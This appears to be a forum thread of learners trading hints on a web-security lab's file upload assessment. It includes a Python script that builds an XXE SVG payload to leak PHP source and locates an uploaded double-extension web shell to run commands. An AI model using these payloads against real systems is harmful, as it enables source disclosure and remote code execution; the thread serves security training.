File Upload Attacks - Skills Assessment

Actually, some other people had already hinted about this… Actually, it is the most popular post of this thread!
I haven’t seen those posts before tackling this problem myself… I had to understand it on my own, but it’s OK, I learned a lot!

According to your copy-paste, you did not leave the correct magic bytes (some of which are “invisible characters”, which makes it impossible to even copy-paste them as-is from your Burp Suite Repeater’s request window… much less copy-paste them into a post here!)

Lessons learned, and a note to my future self: even after solving the challenge, I went back, had to check my notes, and saw that reproducing the steps is not that easy… but I gained some extra experience on that particular point!
So, thank you for asking @Slenderhack !

The only way to solve this challenge is to disclose the .php source code for upload route and be somewhat familiar with PHP and its folder structure.

It took me 1 day to complete the assessment, which was a bit frustrating. I thought it was a bug: when I looked, the browser still returned the same result repeatedly. At that point I used only Burp Suite, and then it worked perfectly :rofl:. My conclusion is to never just trust your browser for pentesting, especially Chrome, Firefox, etc.; browsers must update to protect their users. Use Burp Suite, ZAP, etc.

You have to first read the .php source code using the SVG; then, once you have the directory, you can use tools such as github.com/artemixer/filepwner to upload the shell.

I can track my uploaded file with the mentioned name structure, but I am unable to run the commands.

Now I got the flag. Thanks all of you.

If anyone needs help, text me.

Hi, I saw you succeeded. Can I ask you for a hint, please? I can upload an SVG file, but every time, in the response, I receive the b64 back containing what I sent, not the PHP file to move forward. Where am I wrong, that the XXE is not triggered?

Hi Michal.

You need to avoid the front-end verification, not just be able to upload .SVG files. For the payload, you can check HackTricks.

I finally found the flag! First of all, I’d like to give you just some clues, not the actual answer.

Firstly, you have to take a break for 1 day. I was stuck and, because of that, I was hurrying up and being careless.

Then, look up the “Limited File Uploads” section again and try those payloads. Then you can find the source code of the .php. According to that file, you can reach the uploads folder after that. This is the easiest section: you can find the flag by using the filename that you uploaded ... , and then you can run commands.


Hi Michal,

I am also stuck here, for 2 days now; my SVG gives me back the base64 of the payload I sent. How did you solve this? I crafted my SVG exactly as shown in the module, replacing “index.php” with “contact/upload.php”, but the SVG element is not being populated with the source code.

Hello, did you solve it?
I have the same issue.

This took me hours to do and this is how I completed it:

  1. You can find that there is an upload.php file by looking at script.js and at the POST request made when uploading an image while providing feedback in Contact.

  2. You can view the code of upload.php in base64 by using the XML SVG vulnerability. When you decode the contents, you can see where and how your images are saved. The filename of the file you upload is also changed, as you can see in the source code of upload.php.

  3. Then upload the PHP payload that you used for the previous tasks, with the same double extension. Then visit the file path of your uploaded file, and you’ll find the flag after some commands.

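A worked example of the three steps in the post above, added here and not taken from the module or from any poster: it builds the XXE SVG that reads a PHP file through php://filter, pulls the base64 out of whatever the server echoes back, and derives the date-prefixed name the server gives the upload (the "YY not YYYY" point later in the thread). The upload.php in the block is a constructed stand-in, not the real file; only the date('ymd') prefix and the user_feedback_submissions directory are modelled on what posters report, and the regexes in upload_rules() are written for that stand-in and must be adjusted to the real leaked source.

```python
# Added example (not from the module or any post): XXE-via-SVG source read,
# base64 extraction, and the date-prefixed filename upload.php assigns.
import base64
import datetime
import re
from typing import Optional, Tuple


def xxe_svg(target: str) -> str:
    """SVG whose external entity expands to the base64 of `target`.

    php://filter base64-encodes the file so its '<?php' tags cannot break
    the XML when the entity is expanded inside the <text> node.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE svg [\n"
        f'  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={target}">\n'
        "]>\n"
        '<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">\n'
        '  <text font-size="16" x="0" y="16">&xxe;</text>\n'
        "</svg>\n"
    )


def extract_php_source(response_body: str) -> Optional[str]:
    """Return the first base64 run in the response that decodes to PHP code.

    If the only blob that decodes is your own SVG, the entity was never
    expanded (front-end check not bypassed, wrong extension/Content-Type).
    """
    for blob in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_body):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if "<?php" in text:
            return text
    return None


# PHP date() codes -> strftime. 'y' is the two-digit year, 'Y' the four-digit
# one; reading one as the other is the "YY not YYYY" mistake in the thread.
PHP_TO_STRFTIME = {"y": "%y", "Y": "%Y", "m": "%m", "d": "%d"}


def php_date_to_strftime(php_fmt: str) -> str:
    out = []
    for ch in php_fmt:
        if ch in PHP_TO_STRFTIME:
            out.append(PHP_TO_STRFTIME[ch])
        elif ch in "_-":
            out.append(ch)
        else:
            raise ValueError(f"unhandled PHP date() code {ch!r}")
    return "".join(out)


def upload_rules(php_source: str) -> Tuple[str, str]:
    """Upload directory and date() format from the leaked source.

    These regexes fit the constructed stand-in below; adapt them to the
    real upload.php once you have decoded it.
    """
    d = re.search(r"\$target_dir\s*=\s*'([^']+)'", php_source)
    f = re.search(r"date\('([^']+)'\)", php_source)
    if not (d and f):
        raise ValueError("could not find target_dir / date() in source")
    return d.group(1), f.group(1)


def stored_path(php_source: str, original_name: str, upload_day_iso: str) -> str:
    """Where the server stores `original_name` uploaded on `upload_day_iso`."""
    target_dir, php_fmt = upload_rules(php_source)
    day = datetime.date.fromisoformat(upload_day_iso)
    prefix = day.strftime(php_date_to_strftime(php_fmt))
    return f"{target_dir.rstrip('/')}/{prefix}_{original_name}"


# Constructed stand-in for the leaked upload.php (NOT the real file); it only
# models the behaviour the thread describes: a date-prefixed filename.
CONSTRUCTED_UPLOAD_PHP = (
    "<?php\n"
    "$target_dir = './user_feedback_submissions/';\n"
    "$file_name = date('ymd') . '_' . basename($_FILES['uploadFile']['name']);\n"
    "move_uploaded_file($_FILES['uploadFile']['tmp_name'], $target_dir . $file_name);\n"
)
# Constructed server response: the SVG echoed back with the entity expanded.
CONSTRUCTED_RESPONSE = (
    '<svg xmlns="http://www.w3.org/2000/svg"><text>'
    + base64.b64encode(CONSTRUCTED_UPLOAD_PHP.encode()).decode()
    + "</text></svg>"
)

if __name__ == "__main__":
    print(xxe_svg("contact/upload.php"))
    src = extract_php_source(CONSTRUCTED_RESPONSE)
    print(src)
    # Same shape as the URL quoted later in the thread, then append ?cmd=id
    print(stored_path(src, "shell.phar.jpg", "2025-02-08") + "?cmd=id")
```

If extract_php_source() only ever hands back your own SVG, the entity was not expanded at all, which is the symptom several posters describe; the fix is on the request side (Burp, .svg extension, SVG Content-Type), not in the payload.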

You saved me!!! Just with this: “The filename of the file you upload is also changed”.

Bro, I’ve been stuck on this for days, thank you. I can’t believe all that was stopping me was the MF date format: YY, not YYYY :man_facepalming:

You helped! I appreciate it.
I was stuck on the filename part (I didn’t read the upload.php file well).
Hint: read and analyze “upload.php”.

Hello, me too, I have the same problem. Have you solved it?

Haha… same here… I clicked several times… and cannot find the POST request…

Hi, I’m able to discover the scripts and upload my shell, but how do I execute the commands? I put it like this:
94.237.60.159:56429/contact/user_feedback_submissions/250208_cobra.pht.jpg?cmd=id

For those still struggling with upload.php returning base64 after uploading the XXE SVG file, make sure that:

  1. You capture the request in Burp
  2. There are no magic bytes/MIME
  3. The extension is .svg
  4. You use an SVG content-type

Another useful hint is that you need to upload a REAL jpg image first, then use Burp to modify it.

If you upload shell.phar.jpg directly, it will mostly fail.